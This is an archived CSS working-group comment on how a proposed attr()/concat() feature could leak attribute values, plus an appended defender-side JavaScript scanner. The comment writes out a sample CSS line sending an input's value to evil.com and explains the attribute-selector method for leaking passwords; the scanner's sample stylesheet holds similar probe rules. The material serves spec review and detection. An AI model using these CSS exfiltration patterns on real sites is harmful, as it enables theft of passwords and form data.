Re: [csswg-drafts] [css-values] Keylogging concerns for attr() value

@upsuper attr() can't be used for anything nefarious *today*, but if we add a string-concat function, it lets you trivially exfiltrate any attribute value from an element with something like `background: url(concat("https://evil.com/?value=", attr(value)));`.

But then again, we already know that allowing people to run arbitrary CSS on your site is an XSS vector. It takes a little more effort than just running arbitrary script, but there have been several reasonable POCs written over the years.

The linked article describes using attribute selectors for this purpose, which does work today but requires an exponential explosion of selectors to get something useful. Weak password exfiltration might be reasonable, particularly since using a combination of `^=` and `$=` lets you cut the exponent in half, and using `*=` gives you the set of characters used.

-- 
GitHub Notification of comment by tabatkins
Please view or discuss this issue at https://github.com/w3c/csswg-drafts/issues/2339#issuecomment-367446156 using your GitHub account

Received on Wednesday, 21 February 2018 19:41:37 UTC
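
A defender-side check for the attribute-selector pattern described in the comment above, as an added example that is not part of the original message: it scans stylesheet text for rules that match on `[value^=…]`, `[value$=…]` or `[value*=…]` and load a `url()` from an origin outside an allow-list. The function names, the allow-list parameter and the sample stylesheet (with its hosts) are constructed for illustration.

```javascript
// Added example: audit stylesheet text for attribute-selector probes on `value`.
const PROBE = /\[\s*value\s*([\^$*])=\s*(?:"([^"]*)"|'([^']*)'|([^\]\s]+))\s*(?:[is]\s*)?\]/gi;
const URL_FN = /url\(\s*(?:"([^"]*)"|'([^']*)'|([^)\s]*))\s*\)/gi;

// Constructed sample stylesheet (hypothetical hosts), not from the original thread.
const SAMPLE_CSS = `
/* constructed sample */
input[type="password"][value^="a"] { background: url("https://collector.invalid/p?a"); }
input[value$='z'] { background-image: url(//collector.invalid/s?z) }
input[value*=q] { list-style: url(https://collector.invalid/c?q) }
input[value^="a"] { background: url(/img/ok.png); }
a[href^="http"] { background: url(https://cdn.example/ext.svg); }
@media screen { input[value^="b" i] { background: url(https://cdn.example/x.png) } }
`;

// True when the URL is absolute or protocol-relative and its origin is not allow-listed.
function isRemote(u, allowedOrigins) {
  if (!/^(https?:)?\/\//i.test(u)) return false; // relative and data: URLs are not flagged
  try {
    return !allowedOrigins.includes(new URL(u.startsWith("//") ? "https:" + u : u).origin);
  } catch {
    return true; // unparsable absolute URL: report it for review
  }
}

// Returns one finding per rule that both probes `value` and fetches a remote URL.
// Regex-based and flat: suitable for triage, not a full CSS parser.
function findValueProbes(cssText, allowedOrigins = []) {
  const css = cssText.replace(/\/\*[\s\S]*?\*\//g, ""); // drop comments first
  const findings = [];
  for (const [, selector, body] of css.matchAll(/([^{}]+)\{([^{}]*)\}/g)) {
    const probes = [...selector.matchAll(PROBE)]
      .map(m => ({ op: m[1] + "=", text: m[2] ?? m[3] ?? m[4] }));
    if (probes.length === 0) continue;
    const urls = [...body.matchAll(URL_FN)]
      .map(m => m[1] ?? m[2] ?? m[3])
      .filter(u => isRemote(u, allowedOrigins));
    if (urls.length > 0) findings.push({ selector: selector.trim(), probes, urls });
  }
  return findings;
}

// Tallies which of the three operators appear across the findings.
function operatorCounts(findings) {
  const counts = { "^=": 0, "$=": 0, "*=": 0 };
  for (const f of findings) for (const p of f.probes) counts[p.op]++;
  return counts;
}
```

A large number of findings sharing one host, spread across `^=`, `$=` and `*=`, is the signal to look for; a single hit is more likely ordinary styling.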